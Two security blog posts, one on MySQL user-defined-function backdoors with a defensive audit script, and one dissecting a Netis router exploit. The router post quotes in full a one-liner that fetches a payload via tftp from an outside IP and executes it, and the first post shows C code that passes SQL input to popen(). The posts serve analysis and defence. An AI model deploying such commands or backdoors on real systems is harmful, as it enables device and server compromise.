
Friday, September 16, 2016

MySQL Backdoors in UDFs

Thought this blog post by securusglobal about MySQL backdoors via UDFs was interesting. In short, a UDF is a user-defined function in MySQL: a compiled shared library (typically C/C++) that you load into the server with CREATE FUNCTION ... SONAME so it can be called from SQL like any built-in function. The usual purpose is to manipulate column values, for example in a SELECT, without having to put the non-SQL logic inside the statement itself. Example: select udf_tocelsius(temps.fahrenheit) from temps

But instead of doing something nice like a formula or calculation, as a bad guy you could perhaps do something like

char cmd[1024] = {0};
FILE *fp;
/* args->args[i] is the string the caller passed in from SQL */
strncat(cmd, args->args[i], sizeof(cmd) - 1);
/* popen() hands that string to /bin/sh -c, so the SQL argument is now a shell command */
fp = popen(cmd, "r");


This is C code that essentially runs system commands against the operating system (popen() behaves like the system() function, but also returns a handle for reading the command's output), so whoever can call the function from SQL could pass in commands that download malware, execute it, and so on.

Please note this is not a vulnerability; it is an example of a backdoor persistence method, and quite a few things have to line up for it to work. The attacker already needs enough access to write the shared library into MySQL's plugin_dir (for example via SELECT ... INTO DUMPFILE, which the secure_file_priv setting can restrict) plus the privileges to run CREATE FUNCTION ... SONAME, so if permissions are locked down tight this may never work at all. On the defensive side, every registered UDF is recorded in the mysql.func table (SELECT name, dl FROM mysql.func), so any entry you don't recognize, or whose library you never installed, deserves a look. Interesting nonetheless.
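As an added example (not code from the securusglobal post or from this blog), here is the kind of audit a defender would run against a server to find a UDF like the one above. The mysql.func rows are a constructed stand-in for what `mysql --batch -e "SELECT name, ret, dl, type FROM mysql.func"` prints, the plugin directory is a constructed temp dir, and the library names and the allowlist are assumptions for the demo.

```shell
#!/bin/sh
# Added example: audit the UDFs registered in mysql.func against the plugin
# directory. Everything below is constructed for the demo; on a real server
# you would feed in the actual mysql.func dump and the actual plugin_dir.

# Constructed mysql.func rows: name<TAB>ret<TAB>dl<TAB>type.
FUNC_DUMP=$(printf 'udf_tocelsius\t1\tlibtemps.so\tfunction\nsys_exec\t0\tlibsqlshell.so\tfunction\nold_helper\t0\tlibold.so\tfunction\n')

# Shared libraries the site knowingly deployed to plugin_dir (assumption).
ALLOWED='libtemps.so'

# Build a constructed plugin_dir: one benign library and one whose bytes
# reference popen() and /bin/sh, the way the backdoor UDF above would.
make_plugin_dir() {
    d=$(mktemp -d) || return 1
    printf 'ELF\nudf_tocelsius\n' > "$d/libtemps.so"
    printf 'ELF\nsys_exec\npopen\n/bin/sh\n' > "$d/libsqlshell.so"
    printf '%s\n' "$d"
}

# For every registered UDF not on the allowlist, print "name library verdict".
# Verdicts: library-missing (registered but the file is gone, e.g. a cleanup
# that forgot mysql.func), calls-shell (the library contains the names of
# shell-spawning libc functions; a plain string match is a heuristic, so use
# nm -D or objdump -T on a real .so), not-allowlisted (unknown, inspect it).
audit_udfs() {
    plugin_dir=$1
    tab=$(printf '\t')
    printf '%s\n' "$FUNC_DUMP" | while IFS="$tab" read -r name _ret dl _type; do
        [ -n "$name" ] || continue
        case " $ALLOWED " in *" $dl "*) continue ;; esac
        so="$plugin_dir/$dl"
        if [ ! -f "$so" ]; then
            printf '%s %s library-missing\n' "$name" "$dl"
        elif grep -aq -e 'popen' -e 'system' -e 'execv' "$so"; then
            printf '%s %s calls-shell\n' "$name" "$dl"
        else
            printf '%s %s not-allowlisted\n' "$name" "$dl"
        fi
    done
}

dir=$(make_plugin_dir)
audit_udfs "$dir"
rm -rf "$dir"
```

The allowlist is the important part: a UDF that simply isn't in your deployment inventory is the finding, whatever its library contains, since the string check only catches the lazy case of a library that imports popen() or system() by name.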

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, August 5, 2016

Netis Router Backdoor UDP 53413

I saw this SANS Internet Storm Center post about Netis router backdoor exploit attempts and thought it'd be interesting to take a quick look at one of them. It's a raw UDP packet sent to port 53413 carrying a shell command to be executed, which looks very similar to all those Shellshock attempts you still see in your logs.

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

So first ...

cd /tmp || cd /var/ || cd /dev/;

The first thing the attacker tries is to move into a directory where he likely has write permission. He uses the double pipe (||) so that if the first command fails the second is executed, and if that one fails the third is: essentially "if this works, stop; otherwise try the next, otherwise try the next". So he checks whether he can change into /tmp, /var or /dev, all of which are commonly writable on small embedded systems. Once he is in any of those folders he's ready to execute the more interesting commands.

Then

busybox tftp -r min -g 91.134.141.49;

Next the attacker takes advantage of BusyBox, a single binary found on many embedded Linux devices (including routers like the exploitable Netis models) that bundles many basic Linux commands, among them a tftp client.

tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:

   -r FILE Remote FILE
   -g Get file


So the attacker is using the tftp client to get a remote file called 'min' from the server at 91.134.141.49 and save it to the current directory (again /tmp, /var or /dev, depending on which cd succeeded). Note that -g is a bare flag meaning "get"; the host is the positional argument, and since no port is given the default TFTP port 69 is used.

Then

cp /bin/sh .;

Next the attacker makes a copy of the shell executable in the current directory (again /tmp, /var or /dev, depending on which cd succeeded).

Then

cat min >sh;

Next the downloaded file is written over that copy. A single > truncates and overwrites (it is >> that appends), so nothing of the original shell survives: the file named sh now contains only the downloaded payload, and the earlier cp just created the file under the name the attacker wants to run it as. Appending to a native binary wouldn't have worked anyway, since a compiled executable doesn't run trailing bytes as extra commands.

Then

chmod 777 sh;

Then the permissions on sh are changed so that it is executable (777: read, write and execute for everyone).

Then

./sh.

Finally the attacker executes the file named sh, which is now his downloaded payload, and your router is likely compromised.
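To make the steps above concrete, here is an added example (not from the ISC post or from this blog) that replays the payload's file handling in a throwaway directory. The tftp download is replaced by a constructed local file named min, the sandbox paths stand in for /tmp, /var and /dev, and the only thing taken from the real payload is the command line itself, including the 91.134.141.49 download server.

```shell
#!/bin/sh
# Added example: walk through the Netis payload's stages in a sandbox, with
# the network download swapped for a constructed file, so each step's effect
# on disk is visible. Nothing here touches the real directories or the network.

PAYLOAD='cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.'

# Split the one-liner on ';' and pull the download server and remote file
# name out of the tftp stage. In BusyBox tftp, -g is a bare flag ("get");
# the host is the trailing positional argument.
payload_iocs() {
    printf '%s\n' "$1" | tr ';' '\n' | grep ' tftp ' | awk '{
        for (i = 1; i < NF; i++) if ($i == "-r") file = $(i + 1)
        print $NF, file
    }'
}

# Replay the file-handling stages inside a temp dir (subshell, so the caller's
# working directory is untouched). Prints:
#   <bytes in the copied shell> <bytes after the overwrite> <payload output>
replay_payload() (
    sandbox=$(mktemp -d) || exit 1
    # Same || fallback the payload uses: the first directory does not exist,
    # so the shell moves on to the second cd.
    cd "$sandbox/nonexistent" 2>/dev/null || cd "$sandbox" || exit 1
    # Stand-in for 'busybox tftp -r min -g 91.134.141.49': a constructed,
    # harmless payload written locally instead of fetched from the attacker.
    printf '#!/bin/sh\necho PAYLOAD_RAN\n' > min
    cp /bin/sh .
    before=$(wc -c < sh | tr -d ' ')
    # A single '>' truncates: the copied shell is replaced by the payload,
    # not appended to, so the file shrinks to the payload's size.
    cat min >sh
    after=$(wc -c < sh | tr -d ' ')
    chmod 777 sh
    out=$(./sh)
    cd / && rm -rf "$sandbox"
    printf '%s %s %s\n' "$before" "$after" "$out"
)

payload_iocs "$PAYLOAD"
replay_payload
```

The second number printed is exactly the size of the constructed min file, which is the point: after `cat min >sh` there is no trace of /bin/sh in the file, only the payload, running under a name that looks like a normal shell in a process listing.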

To prevent this: I'm not sure that I've seen anything about Netis actually patching it, so you probably need some sort of IPS (Intrusion Prevention System) with a signature that can block this type of traffic. At a minimum, inbound UDP to port 53413 is not something a router should be accepting from the internet, so dropping it at the perimeter (and alerting on any hit) removes the exposure whether or not a signature matches the particular payload.
